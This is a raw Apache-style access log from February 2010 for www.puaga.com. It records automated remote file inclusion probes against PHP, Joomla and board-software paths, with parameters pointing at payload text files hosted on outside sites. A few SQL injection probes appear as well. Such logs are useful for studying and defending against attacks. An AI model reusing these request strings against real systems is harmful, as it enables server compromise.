91.121.25.16 - - [15/Feb/2010:05:07:08 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:05:07:08 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:05:07:08 -0800] "GET /include.php?path[docroot]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:05:07:08 -0800] "GET /logs//include.php?path[docroot]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:05:08:01 -0800] "GET /write.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:05:08:01 -0800] "GET /logs/access_100201.log//write.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:05:08:01 -0800] "GET /logs//write.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.204.28.195 - - [15/Feb/2010:05:08:16 -0800] "GET /logs/access_100109.log/index.php?pilih=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.816" "www.puaga.com"
85.204.28.195 - - [15/Feb/2010:05:08:18 -0800] "GET /index.php?pilih=' HTTP/1.1" 200 3642 "-" "libwww-perl/5.816" "www.puaga.com"
85.204.28.195 - - [15/Feb/2010:05:08:18 -0800] "GET /logs/index.php?pilih=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.816" "www.puaga.com"
85.204.28.195 - - [15/Feb/2010:05:08:26 -0800] "GET /logs/access_100121.log/index.php?pilih=' HTTP/1.1" 404 5258 "-" "libwww-perl/5.816" "www.puaga.com"
91.121.25.16 - - [15/Feb/2010:05:08:29 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://millwide.com.br/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:05:08:45 -0800] "GET /logs/access_100121.log//conf.pollxt.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:05:08:47 -0800] "GET /conf.pollxt.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:05:08:49 -0800] "GET /logs//conf.pollxt.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:52 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:08:52 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:08:53 -0800] "GET //delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:08:53 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:53 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:08:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [15/Feb/2010:05:08:55 -0800] "GET /logs/access_100128.log%20%20/delete_all.php?board_skin_path=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:18 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:09:18 -0800] "GET /logs/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:09:18 -0800] "GET /errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:09:18 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:18 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:19 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:37 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:37 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:09:37 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:05:09:43 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:09:50 -0800] "GET /logs/access_100207.log/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:09:50 -0800] "GET /prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:09:50 -0800] "GET /logs/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:09:52 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:09:52 -0800] "GET //delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:09:52 -0800] "GET /logs///delete_comment.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:10:05 -0800] "GET /logs/access_100119.log/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:10:57 -0800] "GET /logs/access_100127.log%20%20///conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:10:57 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:10:57 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:05:11:13 -0800] "GET /logs/access_100103.log//write.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.204.28.195 - - [15/Feb/2010:05:11:54 -0800] "GET /index.php?pilih=' HTTP/1.1" 200 3642 "-" "libwww-perl/5.816" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:13:32 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:13:32 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:13:32 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:13:33 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:13:33 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:14:00 -0800] "GET /logs/access_100119.log%20%20/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [15/Feb/2010:05:14:14 -0800] "GET /logs/access_100130.log//conf.pollxt.php?mosConfig_absolute_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:14:16 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:14:16 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:14:16 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:14:35 -0800] "GET /logs/access_100204.log//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:14:35 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:14:35 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:14:44 -0800] "GET /logs/access.log%20%20/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:15:00 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:15:00 -0800] "GET /logs/access_100127.log%20%20///conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:15:01 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:15:24 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:15:24 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:15:24 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:15:27 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:15:31 -0800] "GET /logs/access_100202.log//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:16:50 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:16:51 -0800] "GET /logs/access_100127.log/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:16:51 -0800] "GET /logs/access_100129.log/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:16:51 -0800] "GET /logs/home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
92.243.15.85 - - [15/Feb/2010:05:18:42 -0800] "GET /logs/access_100124.log//components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:19:44 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:19:45 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:13 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:13 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:14 -0800] "GET /logs/access_100124.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:27 -0800] "GET /logs//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:27 -0800] "GET /logs/access_100124.log%20%20//components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:20:27 -0800] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:29 -0800] "GET ///administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:29 -0800] "GET /logs/access_100202.log////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:29 -0800] "GET /logs////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:50 -0800] "GET /logs////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:50 -0800] "GET ///administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:21:50 -0800] "GET /logs/access_100202.log////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:05:22:20 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:22:45 -0800] "GET /logs/access_100124.log/prodler.class.php?sPath=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:23:17 -0800] "GET /connect.lib.php?g4[path]=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:23:17 -0800] "GET /logs/connect.lib.php?g4[path]=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:23:17 -0800] "GET /logs/access_100203.log%20%20/connect.lib.php?g4[path]=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:23:45 -0800] "GET /appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:23:45 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:23:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [15/Feb/2010:05:23:46 -0800] "GET /logs/access_100126.log%20%20//include.php?path[docroot]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:24:03 -0800] "GET /logs/access_100204.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:24:12 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:24:12 -0800] "GET /logs/access_100207.log%20%20//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:24:12 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:19 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:19 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:20 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:22 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:24 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:24 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:28 -0800] "GET /logs/access_100112.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:24:30 -0800] "GET /logs/access_100112.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:24:54 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:05:24:54 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:25:13 -0800] "GET /logs/access_100208.log%20%20////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
